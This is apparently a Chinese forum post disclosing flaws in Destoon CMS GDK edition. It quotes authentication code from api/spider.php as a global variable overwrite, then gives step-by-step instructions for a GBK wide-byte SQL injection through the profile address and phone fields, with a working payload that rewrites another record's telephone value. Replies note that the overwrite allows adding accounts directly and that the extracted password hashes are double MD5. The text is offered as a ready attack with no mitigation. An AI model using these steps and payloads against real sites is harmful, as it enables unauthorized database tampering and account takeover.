DESTOON CMS GDK 版全局变量覆盖通杀漏洞

'destoon\api\spider.php
if($verify_mode == 4) exit('接口未开启');
if(strpos($_SERVER['PHP_SELF'], '/spider.php') !== false) exit('为了系统安全，请修改接口文件名');

$_DPOST = $_POST;
$_DGET = $_GET;

define('DT_ADMIN', true);
require '../common.inc.php';

//校验身份
$pass = false;
if($verify_mode == 1) {
    if($_userid && $_userid == $CFG['founderid']) $pass = true;
} else if($verify_mode == 2) {
    $auth = $_DPOST ? $_DPOST['auth'] : $_DGET['auth'];
    if(strlen($auth) >= 6 && $auth == $spider_auth) $pass = true;
} if($verify_mode == 3) {
    if($DT_IP && $DT_IP == $spider_ip) $pass = true;
}
$pass or exit('身份校验失败');

国际问题全局覆盖。自然就通杀了整套cms。
destoon gdk版注入漏洞.
先注册一个用户。填写个人资料....
在电话号码里写132456
之后确定修改
之后再改一次
在联系地址里写縗\
在联系电话里写
,telephone=787889 WHERE telephone=132456#
提交..之后你会发现联系电话变成了787889
可以确定漏洞存在
好了就说怎么多了
destoon gdk版 全局覆盖变量。这不是人家都发了吗？直接加账户，还用注入吗？？？
注入出来的是2次md5加密。有那么好破？